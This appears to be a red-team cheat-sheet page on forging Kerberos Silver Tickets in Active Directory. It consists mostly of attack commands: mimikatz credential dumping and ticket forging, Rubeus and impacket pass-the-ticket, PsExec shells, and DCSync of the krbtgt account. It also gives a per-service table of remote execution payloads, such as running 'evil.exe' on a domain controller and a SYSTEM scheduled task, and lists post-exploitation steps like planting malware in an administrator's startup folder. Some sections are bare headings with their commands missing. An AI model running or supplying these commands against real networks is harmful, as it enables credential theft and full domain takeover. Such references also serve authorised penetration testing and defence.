githubEdit

Silver Ticket

SILVER TICKET

A Silver Ticket can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).

Forging a Service Ticket (ST) require machine account password (key) or NT hash of the service account.

1) mimikatz.exe

2) privilege::debug

3) lsadump::lsa /inject /name:SERVICE/DOMAIN ADMIN

1) Create a ticket for the service

  • mimikatz $ kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:

  • mimikatz $ kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-134912914

2) Use same steps as a golden ticket

  • mimikatz.exe "kerberos::golden /domain:DOMAIN /sid:DOMAIN_SID /rc4:HASH /user:USER /service:SERVICE /target:TARGET"

Inject the ticket

  • mimikatz.exe "kerberos::ptt TICKET_FILE"

  • .\Rubeus.exe ptt /ticket:TICKET_FILE

Obtain a shell

  • .\PsExec.exe -accepteula \TARGET cmd

Silver Ticket on Linux

  • python ticketer.py -nthash HASH -domain-sid DOMAIN_SID -domain DOMAIN -spn SERVICE_PRINCIPAL_NAME USER

  • export KRB5CCNAME=/root/impacket-examples/TICKET_NAME.ccache

  • python psexec.py DOMAIN/USER@TARGET -k -no-pass

Services to target with a Silver Ticket

Service Type --> Service Silver Tickets --> Attack

1) WMI --> HOST + RPCSS --> wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"

2) Powershell Remoting --> CIFS + HTTP + (wsman?) --> New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC

3) WinRM --> HTTP+ wsman --> New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC

4) Scheduled Tasks --> HOST --> schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"

5) Windows File Share (CIFS) --> CIFS --> dir \dc01\c$

6) LDAP operations including Mimikatz DCSync --> LDAP --> lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt

7) Windows Remote Server Administration Tools (RSAT) --> RPCSS + LDAP + CIFS --> /

Silver Ticket Example

Requirements: Machine account NTLM hash

1) Mimikatz

RC4

AES256

Open a new command prompt since we created and injected the ticket

Check if ticket has retained in the new session

List the C$ contents of our target

2) Rubeus

Forge and inject directly into the current process

OR

Forge and inject into new process (Cleaner)

Forge silver ticket

Createnetonly process, username and password can be anything

Take note of the LUID value of the output (IMPORTANT!). Inject the silver ticket into the new LUID session

Impersonate the process token using the ProcessID from the output of the newly created process (Createnetonly)

Check that the silver ticket has retained in our new shell process.

3) Empire C2

Post Exploitation Techniques Examples

Map drive

Copy malware to Domain Administrator startup folder on DC

CMD

Netcat

Other ticket combinations

Technique
Required Service Ticket

PSexec

CIFS

WinRm

HOST & HTTP

DCSync (DCs only)

LDAP

Last updated